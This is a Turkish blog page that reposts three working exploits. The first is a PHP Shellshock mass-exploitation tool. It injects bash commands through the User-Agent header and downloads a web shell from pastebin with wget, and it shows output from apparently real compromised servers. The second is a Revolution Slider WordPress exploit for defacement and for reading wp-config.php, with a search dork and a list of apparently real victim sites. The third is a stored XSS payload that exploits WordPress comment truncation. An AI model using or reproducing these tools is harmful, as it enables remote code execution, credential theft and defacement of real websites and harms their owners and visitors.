-
12 Mayıs 2015 Salı
no image

<?php/* # SCRIPT by: [ I N U R L - B R A S I L ] - [ By GoogleINURL ] # EXPLOIT NAME: Xpl SHELLSHOCK Ch3ck Tool - (MASS)/ INURL BRASIL # AUTOR: Cleiton Pinheiro / Nick: googleINURL # Email: inurlbr@gmail.com # Blog: http://blog.inurl.com.br # Twitter: https://twitter.com/googleinurl # Fanpage: https://fb.com/InurlBrasil # Pastebin http://pastebin.com/u/Googleinurl # GIT: https://github.com/googleinurl # PSS: http://packetstormsecurity.com/user/googleinurl # YOUTUBE: http://youtube.com/c/INURLBrasil # PLUS: http://google.com/+INURLBrasil -------------------------------------------------------------------------------------- # DESCRIPTION - VULNERABILITY(SHELLSHOCK) - CVE-2014-6271, CVE-2014-6277, - CVE-2014-6278, CVE-2014-7169, - CVE-2014-7186, CVE-2014-7187 Is a vulnerability in GNU's bash shell that gives attackers access to run remote commands on a vulnerable system. -------------------------------------------------------------------------------------- # DESCRIPTION - TOOL The tool inject a malicious user agent that allows exploring the vulnerabildiade sheelshock running server-side commands. -------------------------------------------------------------------------------------- # EXECUTION -t : SET TARGET. -f : SET FILE TARGETS. -c : SET COMMAND. -w : SET UPLOAD SHELL PHP. Execute: php xplSHELLSHOCK.php -t target -c command php xplSHELLSHOCK.php -f targets.txt -c command SHELL UPLOAD: php xplSHELLSHOCK.php -t target -c command -w OUTPUT VULN: SHELLSHOCK_vull.txt -------------------------------------------------------------------------------------- # EXPLOIT MASS USE SCANNER INURLBR ./inurlbr.php --dork 'inurl:"/cgi-bin/login.sh"' -s out.txt -q 1,6 --command-vul "php xpl.php -t '_TARGETFULL_' -c pwd" -------------------------------------------------------------------------------------- # Exemples: php xpl.php -t 'http://www.camnpalxxx.com.br/cgi-bin/login.sh' -c pwd CMD: Linux serv 2.6.29.6-smp #2 SMP Mon Aug 17 00:52:54 CDT 2009 i686 Intel(R) Xeon(R) CPU E5504 @ 2.00GHz GenuineIntel GNU/Linux uid=1000(icone) gid=100(users) groups=100(users) /ico/camnpal/cgi-bin END_CMD: php xpl.php -t 'http://www.bnmxxx.me.gov.ar/cgi-bin/wxis.exe/opac/?IsisScript=opac/opac.xis' -c pwd CMD: Linux sitiobnm 2.6.37BNM #26 SMP Tue Jan 25 19:22:26 ART 2011 x86_64 GNU/Linux uid=1005(webmaster) gid=1003(webmaster) groups=1003(webmaster) /mnt/volume1/sitio/data/catalogos/cgi-bin END_CMD: -------------------------------------------------------------------------------------- */error_reporting(1);set_time_limit(0);ini_set('display_errors', 1);ini_set('max_execution_time', 0);ini_set('allow_url_fopen', 1);ob_implicit_flush(true);ob_end_flush();$op_ = getopt('f:c:t:w::', array('help::'));echo "\n\t[-] [Exploit]: Xpl SHELLSHOCK Ch3ck / INURL - BRASIL\n\t[?] [help]: --help\n\n";$menu = " -t : SET TARGET. -f : SET FILE TARGETS. -c : SET COMMAND. -w : SET UPLOAD SHELL PHP. Execute: php xplSHELLSHOCK.php -t target -c command php xplSHELLSHOCK.php -f targets.txt -c command SHELL UPLOAD: php xplSHELLSHOCK.php -t target -c command -w\n";echo isset($op_['help']) ? $menu : NULL;$cmd = not_isnull_empty($op_['c']) ? "uname -a && id && {$op_['c']}" : exit("\n\t[x] [ERRO] DEFINE COMMAND!\n");$wget = "wget http://pastebin.com/raw.php?i=UD9UwaNd -O inurl.php; chmod 777 inurl.php";$params['host'] = not_isnull_empty($op_['t']) ? $op_['t'] : NULL;$params['user_agent_xpl'] = "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo CMD:;{$cmd}; echo END_CMD:;\"";$params['payload'] = "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo CMD:;{$wget}; echo END_CMD:;\"";$params['file'] = not_isnull_empty($op_['f']) ? $op_['f'] : NULL;$params['line'] = "--------------------------------------------------------------";not_isnull_empty($params['host']) && not_isnull_empty($params['file']) ? exit("\n\t[X] [ERRO] DEFINE TARGET OR FILE TARGET\n") : NULL;not_isnull_empty($params['file']) ? __listTarget($params) . exit() : NULL;echo "\t[+] [COMMAND]: {$cmd}\n";function __plus() { ob_flush(); flush();}function not_isnull_empty($valor = NULL) { RETURN !is_null($valor) && !empty($valor) ? TRUE : FALSE;}function __request($params, $op = 0) { $objcurl = curl_init($params['host']); curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($objcurl, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($objcurl, CURLOPT_TIMEOUT, 5); curl_setopt($objcurl, CURLOPT_FRESH_CONNECT, 1); curl_setopt($objcurl, CURLOPT_USERAGENT, $params['user_agent_xpl']); $info['corpo'] = curl_exec($objcurl) . __plus(); $erro = curl_error($objcurl); not_isnull_empty($erro) ? print("\t[x] [ERROR]: {$erro}\n") : NULL; $_[0] = explode("\n", $info['corpo']); $_[1] = curl_getinfo($objcurl); if ($op != 0) { return $_; } if ($_[0][0] == '99887766555') { foreach ($_[0] as $valores) { $__.= $valores . "\n"; if ($valores == 'END_CMD:') break; } $__ = str_replace('99887766555', '', $__); file_put_contents('SHELLSHOCK_vull.txt', "{$params['host']}{$__}{$params['line']}\n", FILE_APPEND); echo "\t[!] VULN SHELLSHOCK\n\t[!] OUTPUT SERVER:: {$__}"; return TRUE; } else { echo "\t[x] [NOT VULN]\n"; } curl_close($objcurl) . __plus(); return FALSE;}function __listTarget($file) { $tgt_ = array_unique(array_filter(explode("\n", file_get_contents($file['file'])))); echo "\n\t[!] [INFO] TOTAL SITES LOADED : " . count($tgt_) . "\n\n"; foreach ($tgt_ as $url) { echo "\n\t[+] [INFO] SCANNING : {$url} \n"; __plus(); $file['host'] = $url; __request($file) . __plus(); }}if (__request($params)) { $params['user_agent_xpl'] = $params['payload']; $h_ = parse_url($params['host']); $h__ = "http://{$h_['host']}{$h_['path']}/inurl.php?0=uname%20-a%20%26%26%20ls%20-la"; if (isset($op_['w'])) { echo "\t[!] UPLOAD SHELL_SCRIPT!\n"; $__ = __request($params, 1); if ($__[0][0] == '99887766555') { echo "\t[!] PAYLOAD: {$wget}\n"; echo "\t[!] INCTION PAYLOAD SUCCESS\n"; $params['host'] = $h__; $cmd = __request($params, 1); if ($cmd['http_code'] == 200) { echo "\t[!] SUCCESSFULLY UPLOADED FILE {$h__}\n"; echo "\t[!] opening auxiliary window...\n"; system("sudo xterm -geometry 134x50 -e curl -v '$h__' > /dev/null &", $dados); } else { echo "\t[X] FAILURE TO FILE CREATION\n"; } } } echo "\t" . $params['line'] . "\n";}
DEVAMINI OKU..
no image

######################################################################
# Exploit Title: Wordpress Plugin Revolution Slider - Unrestricted File Upload
# Google Dork: inurl://"co.il/wp-admin/admin-ajax.php?action=revslider_ajax_action"
inurl://".co.il/wp-admin/admin-ajax.php?action="
inurl:admin-ajax.php?action=revslider_show_image
-intext:"revslider_show_image" & your own
# Exploit Author: Code Breaker(Team Cyber Switch)
# Vendor HomePage: http://revolution.themepunch.com/
# Version: old
# Tested on: Windows
######################################################################
# Path of File : /wp-content/plugins/revslider/revslider_admin.php
# Get Config/database mysql :  victim.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
# Vulnerable File : revslider_admin.php

# Exploit :

<?php

$post = array
(
"action" => "revslider_ajax_action",
"client_action" => "update_captions_css",
"data" => "<body style='color: transparent;background-color: black'><center><h1><b style='color: white'><center>Hacked By Code Breaker<p style='color: transparent'>"
);

$ch = curl_init ("http://localhost/wp-admin/admin-ajax.php");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);

?>

# Path of Result : /wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css

- REFERENCE
[2] http://www.exploit4arab.net/exploits/1405

Demo:
http://www.neshot.org.il/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
http://lior-tzalamim.co.il/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://mcity.se/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
http://tres.co.il//wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
http://thinkdenovo.com/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
http://www.zabner.co.il/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
http://rozlaw.co.il//wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
http://smart280.co.il/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
http://www.ibambini.co.il/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
http://sonusfaber.co.il/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
http://emech.co.in/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
http://executivebuilders.pk/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
http://promoteindia.in/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
DEVAMINI OKU..
no image

Yes, you’ve read it right: a critical, unpatched 0-day vulnerability affecting WordPress’ comment mechanisms was disclosed earlier today by Klikki Oy.
Who’s affected
If your WordPress site allows users to post comments via the WordPress commenting system, you’re at risk. An attacker could leverage a bug in the way comments are stored in the site’s database to insert malicious scripts on your site, thus potentially allowing them to infect your visitors with malware, inject SEO spam or even insert backdoor in the site’s code if the code runs when in a logged-in administrator browser.
You should definitely disable comments on your site until a patch is made available or leverage a WAF to protect your site and customers.
Technical details
This vulnerability requires an attacker to send a comment long enough to force the backend MySQL database to truncate what is stored.
WordPress Database Schema
As you can see from the above schema, the comments texts are stored in the comment_content column which is a TEXT column, meaning a comment can only contain a maximum of 65535 bytes of data.
A typical exploit would look like the following:
<a href='x onclick=alert(1) AAAAAAAAAAAAAA..(multiplied so our comment contains more than 65k bytes)'>test</a>
Once taken back from the database would look like this:
<p><a href='x onclick=alert(1) AAAAAAA</p>
Some of you might have noticed that the resulting HTML tag isn’t complete, but this isn’t a problem for most modern browsers as most of them will simply patch it up automatically:
Screen Shot 2015-04-27 at 10.43.34 AM
This bug then allows anyone to insert any HTML tag attributes to his hyperlink, including Javascript event handlers.
DEVAMINI OKU..
Kaydol: Yorumlar ( Atom )